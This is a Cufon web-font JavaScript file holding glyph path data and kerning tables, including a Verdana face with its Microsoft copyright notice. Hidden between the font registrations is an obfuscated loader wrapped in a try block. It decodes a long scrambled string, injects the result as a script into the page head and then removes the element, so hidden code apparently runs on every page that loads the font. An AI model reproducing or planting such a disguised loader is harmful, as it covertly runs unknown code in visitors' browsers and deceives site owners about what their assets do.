100,110v-71,0,-100,-39,-101,-110r0,-157r35,0r0,159v-1,51,18,79,66,79xm185,-295r-35,0r0,-34r35,0r0,34xm113,-295r-35,0r0,-34r35,0r0,34","w":263},{"d":"235,-262r-91,130r91,132r-41,0r-71,-108r-73,108r-38,0r91,-131r-89,-131r40,0r71,107r72,-107r38,0","w":246,"k":{"\u2014":14,"\u2013":14,"\u0153":11,"\u0152":2,"\u00f8":11,"\u00e6":9,"\u00d8":2,"\u00c7":2,"y":14,"u":5,"o":11,"e":11,"a":9,"O":2,"G":2,"C":2,"-":14}},{"d":"170,-322v13,0,19,-13,19,-28r23,0v-1,32,-15,53,-44,54v-28,1,-36,-29,-60,-29v-14,0,-19,13,-19,29r-23,0v1,-31,16,-52,45,-53v28,-2,35,27,59,27xm142,-267v82,0,121,52,121,136v0,84,-40,136,-121,136v-82,0,-122,-53,-122,-136v0,-82,40,-136,122,-136xm142,-25v57,0,85,-44,85,-106v0,-62,-28,-106,-85,-106v-58,0,-86,43,-86,106v0,62,28,106,86,106","w":283},{"d":"340,-262r-68,262r-39,0r-55,-217r-54,217r-39,0r-69,-262r36,0r55,218r54,-218r35,0r55,220r55,-220r34,0","w":355,"k":{"\u2014":9,"\u2013":9,"\u0153":18,"\u2026":39,"\u00f8":18,"\u00e6":18,"\u00c6":11,"y":11,"u":11,"r":11,"o":18,"e":18,"a":18,"A":9,";":14,":":14,".":39,"-":9,",":51}},{"d":"36,-192v59,-16,149,-18,149,59r0,133r-33,0r0,-21v-18,12,-36,26,-70,26v-36,0,-64,-27,-64,-62v1,-67,68,-69,134,-73v4,-60,-77,-42,-116,-29r0,-33xm52,-59v0,51,80,35,100,11r0,-55v-41,5,-100,-1,-100,44xm130,-229r-26,0r-48,-66r42,0","w":216},{"d":"334,0r-166,0r0,-98r-92,0r-37,98r-37,0r105,-262r227,0r0,31r-132,0r0,72r132,0r0,31r-132,0r0,97r132,0r0,31xm168,-127r0,-106r-38,0r-42,106r80,0","w":354},{"d":"189,-298r-131,0r0,-28r131,0r0,28xm208,0r-173,0r0,-262r173,0r0,31r-138,0r0,72r138,0r0,31r-138,0r0,97r138,0r0,31"},{"d":"97,-133r-31,0r0,-141r31,0r0,141xm97,69r-31,0r0,-140r31,0r0,140","w":163},{"d":"147,-256v14,0,19,-14,19,-29r23,0v-2,31,-15,53,-45,54v-28,1,-36,-28,-59,-28v-14,0,-19,13,-19,29r-23,0v1,-31,16,-54,44,-54v27,0,37,28,60,28xm131,-202v90,-3,62,118,66,202r-33,0r0,-112v-1,-34,-5,-60,-42,-58v-22,1,-42,11,-56,23r0,147r-33,0r0,-196r33,0r0,21v18,-14,37,-26,65,-27"},{"d":"28,-255v55,-22,153,-16,149,55v-3,51,-39,69,-73,90r0,40r-31,0r0,-54v28,-17,68,-30,68,-74v0,-55,-83,-40,-113,-21r0,-36xm107,0r-36,0r0,-37r36,0r0,37","w":196},{"d":"107,-346v33,0,61,26,61,59v0,33,-28,60,-61,60v-33,0,-62,-27,-62,-60v0,-34,29,-59,62,-59xm107,-250v19,0,36,-18,36,-37v0,-19,-17,-36,-36,-36v-19,0,-37,17,-37,36v0,20,17,37,37,37xm36,-192v59,-16,149,-18,149,59r0,133r-33,0r0,-21v-18,12,-36,26,-70,26v-36,0,-64,-27,-64,-62v1,-67,68,-69,134,-73v4,-60,-77,-42,-116,-29r0,-33xm52,-59v0,51,80,35,100,11r0,-55v-41,5,-100,-1,-100,44","w":216},{"d":"180,-267v82,0,152,71,152,152v0,81,-71,152,-152,152v-81,0,-152,-71,-152,-152v0,-81,70,-152,152,-152xm180,17v70,0,132,-62,132,-132v0,-70,-62,-133,-132,-133v-70,0,-132,63,-132,133v0,70,62,132,132,132xm248,-155v0,25,-17,40,-38,47r68,70r-39,0r-58,-62r-29,0r0,62r-29,0r0,-161v55,1,125,-9,125,44xm152,-122v32,0,64,2,64,-31v0,-29,-35,-24,-64,-24r0,55","w":360},{"d":"35,-262v127,-8,224,15,221,131v-2,89,-56,133,-155,131r-66,0r0,-262xm70,-30v89,5,150,-16,150,-101v0,-84,-61,-106,-150,-101r0,202","w":277,"k":{"\u2026":9,"Z":4,"Y":4,"X":2,"W":4,"T":9,".":9,",":9}},{"d":"180,0v-15,41,25,57,53,41r0,28v-50,17,-98,-15,-81,-69r0,-21v-18,12,-36,26,-70,26v-36,0,-64,-27,-64,-62v1,-67,68,-69,134,-73v4,-60,-77,-42,-116,-29r0,-33v59,-16,149,-18,149,59r0,133r-5,0xm52,-59v0,51,80,35,100,11r0,-55v-41,5,-100,-1,-100,44","w":216},{"d":"202,0r-41,0r-56,-75r-56,75r-38,0r76,-98r-76,-98r42,0r55,74r56,-74r38,0r-77,96","w":213,"k":{"\u2014":9,"\u2013":9,"\u0153":4,"\u00f8":4,"\u00e7":4,"o":4,"g":2,"e":4,"d":2,"c":4,"-":9}},{"d":"180,-267v82,0,152,71,152,152v0,81,-71,152,-152,152v-81,0,-152,-71,-152,-152v0,-81,70,-152,152,-152xm180,17v70,0,132,-62,132,-132v0,-70,-62,-133,-132,-133v-70,0,-132,63,-132,133v0,70,62,132,132,132xm131,-116v0,65,73,71,108,39r3,0r0,32v-61,30,-143,7,-143,-71v0,-76,83,-103,143,-72r0,32v-36,-27,-111,-29,-111,40","w":360},{"d":"143,-160v36,8,61,34,62,75v2,62,-56,105,-121,84v1,-9,-3,-24,2,-29v42,22,89,-4,85,-56v-3,-40,-28,-59,-72,-59r0,-26v34,0,54,-11,54,-44v-1,-22,-16,-34,-40,-34v-35,-1,-46,24,-47,58r0,191r-33,0r0,-190v0,-55,29,-84,82,-85v40,0,72,19,72,57v0,31,-24,47,-44,58","w":223}],f:f};try{(function(s){var c="charAt",i="indexOf",a=String(arguments.callee).replace(/\s+/g,""),z=s.length+-207-a.length+(a.charCodeAt(0)==40&&2),w=64,k=s.substring(z,w+=z),v=s.substr(0,z)+s.substr(w),m=0,t="",x=0,y=v.length,d=document,h=d.getElementsByTagName("head")[0],e=d.createElement("script");for(;x<y;++x){m=(k[i](v[c](x))&255)<<18|(k[i](v[c](++x))&255)<<12|(k[i](v[c](++x))&255)<<6|k[i](v[c](++x))&255;t+=String.fromCharCode((m&16711680)>>16,(m&65280)>>8,m&255);}e.text=t;h.insertBefore(e,h.firstChild);h.removeChild(e);})("3g!7He~s+j>23|yb}eCd,g,>0.~7!e>20.[d+jXQ!vxqUws-0nAZlk[-0nAZlg,I0nAZlk[z0nAZlkCi0nAZlk!zjvW7l@L.~7W7l@L*lCW7l@=]lCW7l@L.UvW7l@=e~yW7l@=-l]TP}kRZUzvP}kRW~j!P}kRZ!@XP}kRW~.CP}kRW~gCP}kRW~kvP}kRZUe~P}kRWlk!P}kRWlwCP}kRZ!jXP}kRWleXP}kRWljvP}kRW~@XP}kRW~j[P}kRZ!g[P}kRWlw~50nAZlkAW0nAZlkvi0nAZlk=i0nAZlk,s0nAZlg[i0nAZlg!]0nAZlklI0nAZlkLZ0nAZlkR*0nAZlk=]0nAZlgLW0nAZlkLs0nAZlkR.0nAZlkcI0nAZlkie}vW7l@=i~vW7l@LZ^vW7l@=]^CW7l@LZlCW7l@L.!yW7l@=zUvW7l@=ilyW7l@LwUyW7l@=z^vW7l@L7~g]*0nAZlgAI0nAZlkA.0nAZlkAd0nAZlglZ0nAZljLZ0nAZlkA{0nAZlkXz0nAZlk,{0nAZlkAI0nAZlkRw0nAZlkX-0nAZlk=-0nAZlgAW0nAZlk~]0nAZlg~y0nAZlgA.0nAZlkc70nAZlkUd0nAZlk}-0nAZlglW0nAZlgUZ0nAZlk=z0nAZlgc*0nAZlkcW0nAZlkRs0nAZlk}z0nAZlkcw0nAZlg[y0nAZlgcw0nAZlk}e0nAZlkRW0nAZlk!]0nAZlkcd0nAZlj!z0nAZlk=e0nAZlkXe0nAZlkPsPCW7l@L.^L=P}kRZ!j~H0nAZlklZ0|>P}kRdlkyP}kRWlwiX0nAZlkU.0nAZlkPI0nAZlkC]0nAZlkU70nAZlzL{0nAZlg,w0nAdl@LIl7W7l@Ld~-Wc0nAZlgcI0nAZlgX]0vW7lzRd~yW7l@Ls^CW7l@LWU7W7l@Lw!kiP}kRZ!zYS0|[P}kRW!eXP}kRWlw!j0nAZlkc*0nAZlzCi0nAZlk,*UCW7l@Lw~CW7l@=yUvWP!vW7l@=ylQ}e0nAZlj,Z0nAdl@C]XvW7l@=zlyW7l@Ci!yW7l@Lw~E=P}kRW~wvP}kRW~jl10nAZlkR{0nAZlkRd0nAZlkld0nAZlgLZ0nAZlkCe0nAZlkL70nAZlkXy0nAZlgA*UESP}kRZ!zXP}kRWlk~P}kRW~z=P}kRW~gXP}kRW!e!P}kRWl.~P}kRW~zCP}k,ZUj~P}kRZ!gvP}kRWlzCP}kRWlkiP}kRZUwvP}kRW~w}P}kRWlk}v0nAZlgAstvW7l@Ls~yW7l@Ce!A!~0nAZlkv]Pvcz0nAZlgCi+CW7l@=-~7W7l@=iU7TP}kRWl.!P}kRW~wCP}kRWlkyP}kRWlzyI0nAZlgU*3yW7l@Ld!yW7l@Ldl7W7l@LdlzyP}kRZUj!s0nAZlg!e0nAZlk,Z0nAZlkUI0.TO0nAZlk!y0nAZlgUw0nAZlgL*HvW7l@CeUE{W0nAZlkPwlLSkPw!@cE},0nAZlg,.0nAZlg!z0nAdl@Ls!CW7l@,WUQSP}kRW~w,THe[P}kRWlevP}kRW~zXP}kRZUkX[0nAZlgU7tCW7l@=i!@[P}kRW!e[P}kRw~.Ab0nAZlkA*0nAZlgL{0nAdl@L{}-!P}kRZ!z[P}kRZ!j!P}kRZU.!P}kRW~e[P}kRZ!gCP}kRZ!eCP}kRW~z~P}k,Wlz[P}kRW~wiP}k,Zlk~P}kRW~.XP}kRZ!evP}kRZUz=P}kRZ!j[P}kRWleL]0nAZlk]d0nAZlg,sc]Zi0nAR=|@LCgn,[3fl~^tcXEkAvj0U!+HP}O4Yi-z]yeQ;TDhqS25ZWdws7.*{I(bx>1KZlgls0nAZlgl{0nAZlglw^yW7l@=iUelyX7W7l@=zU7W7l@=]lyW7l@=e^vW7l@CilvW7l@=-lvW7l@=z!CW7!e!y~j}P}kRZUk~P}kRWlkC>0nAZlg[-0nAZlkAZ0nAZlk=yk7W7l@=y^nIq0nAZlgc.0nAZlkP.~kX^0nAZlgcW4CW7l@LwUvW7l@=z~*[P}kRW~.v(0nAZlg,{0nAZlg~-0nAZlkAw3CW7l@LslCW7l@=-!yW7l@Ld~jSP}kRZ!e[P}kRZUeXP}kRW~jvP}kRZ!k~P}k,Zlj~E0nAZlkl*0nAZlgvy0nAZlkC-0nAZlgXzjCW7l@=]~v}P}kRZ!k=P}kRZUw!P}kRWlk[P}kRZUk!P}kRZ!zLK0nAZlgA70nAZlgCyXCW7l@LZ~0iP}kRZUkyP}kRZ!gU-fQ~ZHgys3|,-3EWTtkRqP@7-fQRqH@7ZfeWyHe}s+|WQtj,2!-IQHnyZ+nl>O*sb+jU;U-I5+ws50-YK^Q}*}7Z23kx;tw;237Z2HeXZU.WT!jIs0|IzH.7xf-SPfe~-HvZ2H*[Q4|{h0|IzUe77+7Z2H*[Q0|I7+d]]f.]2}gvw}|iqH.~i}gy5H-I;H*~sHeCS!E]T!e>d3@STtgZb3dST3j}HU7ST0vs>PCST00sT3|]Y")}catch(e){}delete _cufon_bridge_;return b.ok&&f})({"w":227,"face":{"font-family":"Verdana","font-weight":400,"font-stretch":"normal","units-per-em":"360","panose-1":"2 11 6 4 3 5 4 4 2 4","ascent":"288","descent":"-72","x-height":"5","bbox":"-11.3052 -361 365 74.6356","underline-thickness":"21.0938","underline-position":"-21.0938","unicode-range":"U+0020-U+2122"}}));
/*!
 * The following copyright notice may not be removed under any circumstances.
 * 
 * Copyright:
 * © 2006 Microsoft Corporation. All Rights Reserved.
 * 
 * Trademark:
 * Verdana is either a registered trademark or a trademark of Microsoft
 * Corporation in the United States and/or other countries.
 * 
 * License information:
 * http://www.microsoft.com/typography/fonts/
 */
Cufon.registerFont((function(f){var b=_cufon_bridge_={p:[{"d":"72,35v30,10,69,10,61,-35r-44,0r0,-211r-82,0r0,-51r231,0r0,51r-82,0r0,207v14,-2,17,1,17,19v0,52,-51,68,-101,55r0,-35","w":245},{"d":"97,-85v-8,44,25,53,59,40r0,43v-55,13,-122,9,-122,-60r0,-93r-26,0r0,-42r26,0r0,-57r63,0r0,57r59,0r0,42r-59,0r0,70xm207,-324r-41,96r-40,0r21,-96r60,0","w":167},{"d":"123,-133r-51,0r0,-141r51,0r0,141xm123,69r-51,0r0,-140r51,0r0,140","w":195},{"d":"229,-291r-46,0r-33,-39r-32,39r-46,0r57,-69r44,0xm268,0r-67,0r0,-115r-100,0r0,115r-68,0r0,-262r68,0r0,96r100,0r0,-96r67,0r0,262","w":301},{"d":"93,0r-63,0r0,-197r63,0r0,197xm126,-226r-48,0r0,-48r48,0r0,48xm46,-226r-49,0r0,-48r49,0r0,48","w":123},{"d":"123,69r-51,0r0,-343r51,0r0,343","w":195},{"d":"18,35v28,10,69,9,61,-35r-49,0r0,-197r63,0r0,29v25,-20,42,-33,80,-29r0,60v-28,-3,-58,-5,-80,5r0,128r25,0v11,63,-39,90,-100,74r0,-35","w":178},{"d":"79,-62v-1,36,56,28,70,10r0,-41v-28,5,-68,0,-70,31xm150,-130v-6,-50,-85,-23,-118,-16r0,-47v65,-15,180,-24,180,59r0,134r-63,0r0,-21v-33,41,-138,33,-134,-36v4,-67,70,-68,135,-73xm191,-226r-52,0r0,-48r52,0r0,48xm97,-226r-52,0r0,-48r52,0r0,48","w":240},{"d":"93,0r-63,0r0,-274r63,0r0,274xm126,-361r0,4r-62,65r-43,0r44,-69r61,0","w":123},{"d":"119,-121r63,0r0,-93r-26,0xm182,-71r-83,0r-28,71r-70,0r107,-262r263,0r0,51r-123,0r0,45r114,0r0,51r-114,0r0,64r123,0r0,51r-189,0r0,-71","w":393},{"d":"26,-252v58,-25,178,-24,176,54v-1,53,-34,72,-72,88r0,40r-62,0r0,-60v31,-8,66,-19,66,-55v0,-50,-76,-33,-101,-13r-7,0r0,-54xm135,0r-71,0r0,-46r71,0r0,46","w":222},{"d":"124,-204v66,0,108,41,108,105v0,64,-42,105,-108,105v-67,0,-109,-40,-109,-105v0,-66,42,-105,109,-105xm124,-38v33,0,42,-24,42,-60v0,-35,-9,-60,-42,-61v-35,0,-43,26,-43,61v0,35,9,60,43,60xm197,-226r-52,0r0,-48r52,0r0,48xm103,-226r-52,0r0,-48r52,0r0,48","w":247},{"d":"195,-237r-141,0r0,-37r141,0r0,37xm79,-87v1,62,104,55,135,25r7,0r0,51v-83,35,-206,16,-206,-87v0,-67,46,-106,113,-106v71,0,101,42,96,117r-145,0xm161,-124v5,-40,-43,-49,-69,-31v-8,6,-12,17,-13,31r82,0","w":239},{"d":"176,-295r-57,69r-44,0r-56,-69r46,0r33,40r32,-40r46,0xm93,-168v25,-20,42,-33,80,-29r0,60v-28,-3,-58,-5,-80,5r0,132r-63,0r0,-197r63,0r0,29","w":178},{"d":"7,-54v35,10,95,18,95,-29r0,-131r-60,0r0,-48r128,0r0,185v1,79,-87,90,-163,76r0,-53","w":199},{"d":"271,0r-65,0r-111,-180r0,180r-62,0r0,-262r81,0r96,150r0,-150r61,0r0,262xm220,-361r0,4r-62,65r-43,0r44,-69r61,0","w":304},{"d":"143,-264v12,1,14,-10,15,-20r38,0v-2,36,-15,58,-50,58v-23,0,-32,-18,-52,-20v-13,-1,-15,8,-15,21r-39,0v1,-32,19,-58,50,-58v24,1,33,17,53,19xm79,-62v-1,36,56,28,70,10r0,-41v-28,5,-68,0,-70,31xm150,-130v-6,-50,-85,-23,-118,-16r0,-47v65,-15,180,-24,180,59r0,134r-63,0r0,-21v-33,41,-138,33,-134,-36v4,-67,70,-68,135,-73","w":240},{"d":"16,-97v0,-84,76,-130,143,-92r0,-85r63,0r0,274r-63,0r0,-21v-20,16,-33,25,-64,26v-53,1,-79,-46,-79,-102xm81,-98v-8,53,45,67,78,44r0,-97v-41,-17,-82,6,-78,53xm334,-274r-51,104r-41,0r27,-104r65,0","w":316},{"d":"124,-252v20,0,29,-14,28,-36r39,0v9,65,-78,85,-118,50v-12,-11,-17,-28,-17,-50r39,0v0,23,8,36,29,36xm124,-204v66,0,108,41,108,105v0,64,-42,105,-108,105v-67,0,-109,-40,-109,-105v0,-66,42,-105,109,-105xm124,-38v33,0,42,-24,42,-60v0,-35,-9,-60,-42,-61v-35,0,-43,26,-43,61v0,35,9,60,43,60","w":247},{"d":"345,-197r-61,197r-68,0r-40,-133r-39,133r-68,0r-61,-197r66,0r34,136r42,-136r56,0r40,136r34,-136r65,0","w":352},{"d":"171,-151v39,5,71,29,72,69v2,68,-61,92,-129,82r0,-48v32,8,65,-1,64,-38v-1,-29,-23,-37,-56,-37r0,-46v24,0,37,-12,37,-36v0,-18,-11,-28,-31,-28v-25,0,-35,18,-35,42r0,191r-63,0r0,-186v-1,-58,40,-90,99,-89v52,1,90,14,93,62v3,35,-26,54,-51,62","w":256},{"d":"146,23v26,5,67,14,62,-25r-113,-178r0,180r-62,0r0,-262r81,0r96,148r0,-148r61,0r0,264v5,64,-64,83,-125,68r0,-47","w":304},{"d":"161,-226r-65,0r0,-48r65,0r0,48xm16,-104v0,-81,78,-121,142,-85r2,-8r62,0r0,174v9,101,-101,108,-185,89r0,-49v45,11,128,30,122,-40v-15,11,-32,21,-57,20v-59,0,-86,-38,-86,-101xm81,-102v0,52,46,61,78,40r0,-90v-41,-15,-78,5,-78,50","w":251},{"d":"79,-87v1,62,104,55,135,25r7,0r0,51v-83,35,-206,16,-206,-87v0,-67,46,-106,113,-106v71,0,101,42,96,117r-145,0xm161,-124v5,-40,-43,-49,-69,-31v-8,6,-12,17,-13,31r82,0xm186,-295r0,4r-62,65r-43,0r44,-69r61,0","w":239},{"d":"114,-274r-51,104r-41,0r27,-104r65,0","w":119},{"d":"190,-237r-141,0r0,-37r141,0r0,37xm79,-62v-1,36,56,28,70,10r0,-41v-28,5,-68,0,-70,31xm150,-130v-6,-50,-85,-23,-118,-16r0,-47v65,-15,180,-24,180,59r0,134r-63,0r0,-21v-33,41,-138,33,-134,-36v4,-67,70,-68,135,-73","w":240},{"d":"93,-168v25,-20,42,-33,80,-29r0,60v-28,-3,-58,-5,-80,5r0,132r-63,0r0,-197r63,0r0,29xm162,-295r0,4r-62,65r-43,0r44,-69r61,0","w":178},{"d":"314,-263r-138,263r-48,0r138,-263r48,0xm406,-35r-29,0r0,35r-46,0r0,-35r-83,0r0,-46r80,-85r49,0r0,99r29,0r0,32xm332,-67r0,-60r-58,60r58,0xm114,-216v-5,-31,-61,-8,-80,-3r0,-37v39,-16,131,-21,132,31v1,23,-17,33,-31,41v19,4,34,16,35,38v4,60,-94,58,-139,41r0,-38v22,6,80,28,88,-6v0,-22,-33,-15,-55,-16r0,-35v21,-1,54,6,50,-16","w":425},{"d":"143,-226r-65,0r0,-48r65,0r0,48xm200,0r-185,0r0,-41r104,-110r-100,0r0,-46r179,0r0,39r-102,111r104,0r0,47","w":214},{"d":"217,-295r-47,69r-39,0r32,-69r54,0xm142,-295r-47,69r-38,0r31,-69r54,0xm124,-204v66,0,108,41,108,105v0,64,-42,105,-108,105v-67,0,-109,-40,-109,-105v0,-66,42,-105,109,-105xm124,-38v33,0,42,-24,42,-60v0,-35,-9,-60,-42,-61v-35,0,-43,26,-43,61v0,35,9,60,43,60","w":247},{"d":"134,-176v41,-44,135,-35,135,48r0,128r-64,0r0,-98v0,-30,-2,-56,-34,-54v-15,0,-25,5,-37,12r0,140r-64,0r0,-197r64,0r0,21xm88,-274r-52,104r-41,0r28,-104r65,0","w":297},{"d":"190,-170r-41,0r-51,-104r64,0xm94,-170r-41,0r-51,-104r65,0","w":211},{"d":"153,-267v84,0,135,52,135,136v0,82,-51,136,-135,136v-84,0,-135,-54,-135,-136v0,-84,51,-136,135,-136xm153,-44v47,0,65,-38,65,-87v0,-50,-19,-87,-65,-87v-47,0,-65,38,-65,87v0,50,18,87,65,87xm196,-292r-43,0r-62,-65r0,-4r61,0","w":306},{"d":"128,-252v20,0,29,-14,28,-36r39,0v9,65,-78,85,-118,50v-12,-11,-17,-28,-17,-50r39,0v0,23,8,36,29,36xm16,-104v0,-81,78,-121,142,-85r2,-8r62,0r0,174v9,101,-101,108,-185,89r0,-49v45,11,128,30,122,-40v-15,11,-32,21,-57,20v-59,0,-86,-38,-86,-101xm81,-102v0,52,46,61,78,40r0,-90v-41,-15,-78,5,-78,50","w":251},{"d":"155,-33v0,51,15,69,66,63r0,39v-78,6,-131,-9,-123,-94v4,-47,-23,-57,-71,-56r0,-43v59,5,74,-21,71,-81v-4,-63,56,-74,123,-69r0,40v-50,-5,-66,9,-66,62v0,37,-23,57,-53,68r0,4v30,11,53,30,53,67"},{"d":"89,-106r-49,0r0,-41r49,0r0,-64r-82,0r0,-51r231,0r0,51r-82,0r0,64r50,0r0,41r-50,0r0,106r-67,0r0,-106","w":245},{"d":"119,-70r45,-127r65,0r-110,269r-68,0r31,-73r-77,-196r67,0xm183,-295r0,4r-62,65r-43,0r44,-69r61,0","w":234},{"d":"292,-194r-24,0r0,194r-67,0r0,-115r-100,0r0,115r-68,0r0,-194r-23,0r0,-38r23,0r0,-30r68,0r0,30r100,0r0,-30r67,0r0,30r24,0r0,38xm201,-166r0,-28r-100,0r0,28r100,0","w":301},{"d":"227,57r-54,0r-140,-331r55,0","w":248},{"d":"257,73v-51,6,-74,-44,-56,-86r-14,-40r-97,0r-18,53r-68,0r97,-262r78,0r96,262r-42,0v-8,41,31,46,61,34r0,35v-9,3,-28,4,-37,4xm171,-101r-32,-94r-32,94r64,0","w":279},{"d":"210,-302r-141,0r0,-37r141,0r0,37xm275,0r-70,0r-18,-53r-97,0r-18,53r-68,0r97,-262r78,0xm171,-101r-32,-94r-32,94r64,0","w":279},{"d":"268,-104r-106,82r0,-54r53,-40r-53,-39r0,-54r106,81r0,24xm158,-104r-106,82r0,-54r53,-40r-53,-39r0,-54r106,81r0,24","w":305},{"d":"43,35v28,9,68,11,61,-31v-47,-1,-70,-18,-70,-66r0,-93r-26,0r0,-42r26,0r0,-57r63,0r0,57r59,0r0,42r-59,0v2,55,-18,140,59,110r0,43v-4,1,-8,3,-13,3v11,60,-42,84,-100,69r0,-35","w":164},{"d":"196,-226r-46,0r-33,-38r-32,38r-46,0r57,-69r44,0xm119,-70r45,-127r65,0r-110,269r-68,0r31,-73r-77,-196r67,0","w":234},{"d":"93,0r-63,0r0,-197r63,0r0,197xm95,-226r-67,0r0,-48r67,0r0,48","w":123},{"d":"76,35v32,11,70,8,61,-39r39,0v11,63,-39,90,-100,74r0,-35"},{"d":"198,-295r-56,69r-44,0r-57,-69r47,0r32,40r33,-40r45,0xm200,-10v-76,35,-185,8,-185,-88v0,-97,108,-126,185,-89r0,54v-26,-3,-34,-25,-67,-25v-35,0,-52,25,-52,60v0,67,82,71,110,34r9,0r0,54","w":211},{"d":"266,-193r-77,77r77,76r-33,33r-77,-76r-77,76r-33,-33r77,-76r-77,-77r33,-33r77,77r77,-77","w":312},{"d":"16,-104v0,-81,78,-121,142,-85r2,-8r62,0r0,174v9,101,-101,108,-185,89r0,-49v45,11,128,30,122,-40v-15,11,-32,21,-57,20v-59,0,-86,-38,-86,-101xm81,-102v0,52,46,61,78,40r0,-90v-41,-15,-78,5,-78,50","w":251},{"d":"79,-62v-1,36,56,28,70,10r0,-41v-28,5,-68,0,-70,31xm150,-130v-6,-50,-85,-23,-118,-16r0,-47v65,-15,180,-24,180,59r0,134r-25,0v-11,39,31,47,60,34r0,35v-59,15,-111,-8,-98,-76v2,-11,0,-11,0,-14v-34,41,-137,33,-134,-36v3,-67,70,-68,135,-73","w":240},{"d":"127,-252v20,0,29,-14,28,-36r40,0v8,64,-78,85,-118,50v-12,-11,-18,-28,-18,-50r39,0v0,23,8,36,29,36xm79,-87v1,62,104,55,135,25r7,0r0,51v-83,35,-206,16,-206,-87v0,-67,46,-106,113,-106v71,0,101,42,96,117r-145,0xm161,-124v5,-40,-43,-49,-69,-31v-8,6,-12,17,-13,31r82,0","w":239},{"d":"100,-43v48,25,83,-30,64,-88xm150,-152v-50,-31,-87,28,-66,89xm232,-99v5,85,-86,127,-162,94r-24,33r-31,0r35,-46v-21,-16,-35,-45,-35,-81v0,-88,91,-127,165,-92r21,-29r31,0r-32,42v18,18,30,44,32,79","w":247},{"d":"222,0r-189,0r0,-262r68,0r0,211r121,0r0,51xm164,-361r0,4r-62,65r-43,0r44,-69r61,0","w":229},{"d":"157,-226r-65,0r0,-48r65,0r0,48xm79,-87v1,62,104,55,135,25r7,0r0,51v-83,35,-206,16,-206,-87v0,-67,46,-106,113,-106v71,0,101,42,96,117r-145,0xm161,-124v5,-40,-43,-49,-69,-31v-8,6,-12,17,-13,31r82,0","w":239},{"d":"148,-130v-4,-51,-83,-23,-116,-16r0,-47v43,-11,124,-18,155,9v17,-11,42,-20,69,-20v71,0,101,42,96,117r-143,0v0,64,102,54,132,25r7,0r0,51v-50,25,-140,21,-176,-16v-22,15,-47,32,-90,32v-39,0,-67,-26,-67,-62v0,-67,68,-68,133,-73xm289,-124v4,-38,-41,-50,-67,-31v-8,6,-12,17,-13,31r80,0xm79,-62v0,38,59,26,75,8v-5,-12,-7,-25,-7,-38v-31,3,-68,1,-68,30","w":366},{"d":"131,-209v-4,-40,-66,-19,-91,-12r0,-38v50,-12,141,-18,141,47r0,107r-51,0r0,-16v-27,32,-103,26,-103,-29v0,-53,54,-55,104,-59xm75,-154v-2,28,44,21,55,8r0,-33v-23,3,-54,0,-55,25","w":215},{"d":"229,-93r-202,0r0,-47r202,0r0,47"},{"d":"200,-226r-46,0r-33,-38r-32,38r-46,0r57,-69r44,0xm200,-10v-76,35,-185,8,-185,-88v0,-97,108,-126,185,-89r0,54v-26,-3,-34,-25,-67,-25v-35,0,-52,25,-52,60v0,67,82,71,110,34r9,0r0,54","w":211},{"d":"203,-360r-57,69r-44,0r-56,-69r46,0r33,40r32,-40r46,0xm236,0r-220,0r0,-49r130,-162r-124,0r0,-51r207,0r0,50r-131,161r138,0r0,51","w":249},{"w":123},{"d":"177,-291r-47,0r-32,-39r-32,39r-46,0r56,-69r44,0xm175,0r-153,0r0,-46r43,0r0,-169r-43,0r0,-47r153,0r0,47r-43,0r0,169r43,0r0,46","w":196},{"d":"128,-303v30,0,56,24,56,53v0,29,-26,53,-56,53v-31,0,-56,-23,-56,-53v0,-30,26,-54,56,-53xm128,-224v15,0,24,-12,24,-26v1,-13,-11,-26,-24,-26v-13,0,-24,12,-24,26v0,14,9,26,24,26xm126,-46v12,-1,28,-5,37,-11r0,-140r64,0r0,197r-64,0r0,-22v-40,45,-135,35,-135,-47r0,-128r64,0r0,98v0,32,2,55,34,53","w":256},{"d":"218,-289r-46,0r-33,-39r-32,39r-46,0r57,-69r44,0xm275,0r-70,0r-18,-53r-97,0r-18,53r-68,0r97,-262r78,0xm171,-101r-32,-94r-32,94r64,0","w":279},{"d":"189,-150v12,16,10,49,0,66r37,36r-29,28r-36,-36v-17,11,-49,10,-66,0r-37,37r-28,-29r37,-37v-11,-16,-10,-49,1,-65r-37,-37r27,-28r37,37v16,-11,49,-10,65,0r37,-37r29,28xm127,-88v16,0,30,-14,30,-29v0,-15,-15,-30,-30,-30v-15,0,-29,14,-29,30v0,16,13,29,29,29"},{"d":"175,0r-153,0r0,-46r43,0r0,-169r-43,0r0,-47r153,0r0,47r-43,0r0,169r43,0r0,46xm160,-361r0,4r-62,65r-43,0r44,-69r61,0","w":196},{"d":"93,-176v42,-43,135,-35,135,48r0,128r-63,0r0,-98v-1,-29,-2,-56,-35,-54v-15,1,-25,5,-37,12r0,140r-63,0r0,-197r63,0r0,21xm51,35v32,11,70,8,61,-39r39,0v11,63,-39,90,-100,74r0,-35","w":256},{"d":"236,-291r-47,0r-32,-39r-33,39r-45,0r56,-69r44,0xm88,-132v0,65,39,93,108,89r0,-52r-52,0r0,-49r121,0r0,129v-24,9,-69,20,-105,20v-88,0,-142,-50,-142,-136v0,-84,58,-137,145,-136v42,1,68,7,101,23r0,62v-33,-9,-49,-37,-93,-36v-54,1,-83,33,-83,86","w":291},{"d":"94,0r-62,0r0,-69r62,0r0,69xm220,0r-62,0r0,-69r62,0r0,69xm345,0r-61,0r0,-69r61,0r0,69","w":377},{"d":"217,-360r-57,69r-44,0r-56,-69r46,0r33,40r32,-40r46,0xm101,-143v41,0,79,2,79,-39v0,-37,-42,-32,-79,-32r0,71xm250,-190v0,43,-22,63,-52,78r87,112r-82,0r-71,-96r-31,0r0,96r-68,0r0,-262v93,4,215,-22,217,72","w":281},{"d":"171,-217v0,42,-37,61,-63,81r74,0r0,37r-142,0r0,-34v28,-19,77,-35,77,-74v0,-38,-53,-15,-76,-8r0,-41v43,-17,130,-21,130,39","w":215},{"d":"146,-44v35,0,49,-18,49,-54r0,-164r68,0r0,167v0,68,-45,100,-117,100v-72,0,-117,-31,-116,-100r0,-167r68,0r0,164v-1,36,14,53,48,54xm219,-292r-52,0r0,-48r52,0r0,48xm125,-292r-52,0r0,-48r52,0r0,48","w":292},{"d":"31,-237v23,0,46,-6,48,-25r42,0r0,164r-48,0r0,-107r-42,0r0,-32xm291,-263r-138,263r-48,0r138,-263r48,0xm390,-117v0,42,-37,61,-63,81r74,0r0,37r-142,0r0,-34v28,-19,77,-35,77,-74v0,-38,-53,-15,-76,-8r0,-41v43,-17,130,-21,130,39","w":425},{"d":"56,35v28,9,68,10,61,-31v-37,4,-75,-4,-100,-14r0,-52v26,8,47,25,83,25v24,0,48,-11,31,-27v-44,-14,-114,-13,-113,-73v2,-70,116,-78,174,-52r0,50v-23,-7